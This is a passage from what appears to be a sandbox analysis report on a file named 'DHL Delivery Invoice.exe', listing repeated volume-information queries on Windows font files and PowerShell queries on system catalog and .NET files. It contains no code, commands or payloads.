                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Users\user\Desktop\DHL Delivery Invoice.exe VolumeInformationJump to behavior
